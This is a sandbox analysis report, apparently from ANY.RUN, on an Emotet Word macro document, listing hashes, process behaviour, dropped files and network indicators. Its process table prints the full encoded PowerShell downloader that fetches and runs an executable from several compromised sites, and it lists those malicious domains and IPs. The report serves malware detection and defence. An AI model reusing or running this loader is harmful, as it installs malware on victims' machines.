File name:

TheG0df2ther@Emotet.doc

Full analysis: https://app.any.run/tasks/21c57cce-bb34-4056-9a44-92927a9655a9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: November 21, 2021, 19:15:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

B92021CA10AED3046FC3BE5AC1C2A094

SHA1:

0FB1AD5B53CDD09A7268C823EC796A6E623F086F

SHA256:

C378387344E0A552DC065DE6BFA607FD26E0B5C569751C79FBF9C6F2E91C9807

SSDEEP:

3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Checks supported languages

      • powershell.exe (PID: 2152)

    • Reads the date of Windows installation

      • powershell.exe (PID: 2152)

    • Executed via WMI

      • powershell.exe (PID: 2152)

    • Reads the computer name

      • powershell.exe (PID: 2152)

    • PowerShell script executed

      • powershell.exe (PID: 2152)

    • Creates files in the user directory

      • powershell.exe (PID: 2152)

    • Reads Environment values

      • powershell.exe (PID: 2152)

    • Executes application which crashes

      • powershell.exe (PID: 2152)

  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 3296)
      • ntvdm.exe (PID: 968)

    • Reads the computer name

      • WINWORD.EXE (PID: 3296)

    • Reads mouse settings

      • WINWORD.EXE (PID: 3296)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3296)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3296)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2152)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x247a0b47
ZipCompressedSize: 524
ZipUncompressedSize: 3939
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: -
Description: -

XML

Keywords: -
LastModifiedBy: -
RevisionNumber: 1
CreateDate: 2019:09:16 12:22:00Z
ModifyDate: 2019:09:16 12:22:00Z
Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: 66
Characters: 380
Application: Microsoft Office Word
DocSecurity: None
Lines: 3
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 445
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
968"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntvdm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2152powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
3296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\TheG0df2ther@Emotet.doc.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
8 309
Read events
7 487
Write events
692
Delete events
130

Modification events

(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:|&<
Value:
7C263C00E00C0000010000000000000000000000
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
3
Text files
40
Unknown types
3

Dropped files

PID
Process
Filename
Type
3296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR166D.tmp.cvr
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$eG0df2ther@Emotet.doc.docmpgc
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40458E9F.wmfimage
MD5:47494691A7204F143E5910EF1947C99E
SHA256:CDFB8B2FF4202BC86346915D1EBDE4E45AB67E40E50EE8D0529D4D7FC4EEC759
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\375E43EC.datimage
MD5:B968160E32B2FBEBB3FF6C55F5B4885B
SHA256:7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A229ABAE.datimage
MD5:35428803E94ECDFA6A957382868444DA
SHA256:73B03956B8DD27BFD4F7A828A7654456D6952E4C75AA03CF3F5050EEE366BCAE
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93B6FB42.datimage
MD5:C1F138C3F19B5545D60B3B5D4C2BA4FC
SHA256:80C4552EC9FED881E1806AA55368D3428832F52157AB8D92E7FB531658961A3E
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E90DB105.wmfimage
MD5:E6FC21E06D4C1D2DD72A8D2D58BC9582
SHA256:52FBAD38CD46CBBB7B0F1978BE53A747AEC181DE14CD232B41C101A355AE8385
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AA0FCA0.datimage
MD5:B2B55276284D41BAA290155CB55A94E2
SHA256:C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1D90E5B.wmfimage
MD5:8436C2235EB1BBD97ADF43E95FD02CE8
SHA256:48F88EC1E3A36BC969EFBDD8E6A12D66EF8CFCF6B247708B018DE21DF2A6615F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
7
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2152
powershell.exe
GET
301
173.198.248.218:80
http://www.deepikarai.com/bangalore-escorts.php
US
html
256 b
malicious
2152
powershell.exe
GET
200
208.91.197.27:80
http://blockchainjoblist.com/wp-admin/014080/
US
html
18.0 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2152
powershell.exe
208.91.197.27:80
blockchainjoblist.com
Confluence Networks Inc
US
malicious
2152
powershell.exe
78.41.204.28:443
yeuquynhnhai.com
Snel.com B.V.
NL
malicious
2152
powershell.exe
173.198.248.218:443
deepikarai.com
Turnkey Internet Inc.
US
unknown
2152
powershell.exe
173.198.248.218:80
deepikarai.com
Turnkey Internet Inc.
US
unknown

DNS requests

Domain
IP
Reputation
blockchainjoblist.com
  • 208.91.197.27
malicious
womenempowermentpakistan.com
malicious
atnimanvilla.com
malicious
yeuquynhnhai.com
  • 78.41.204.28
malicious
deepikarai.com
  • 173.198.248.218
suspicious
www.deepikarai.com
  • 173.198.248.218
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
TheG0df2ther@Emotet.doc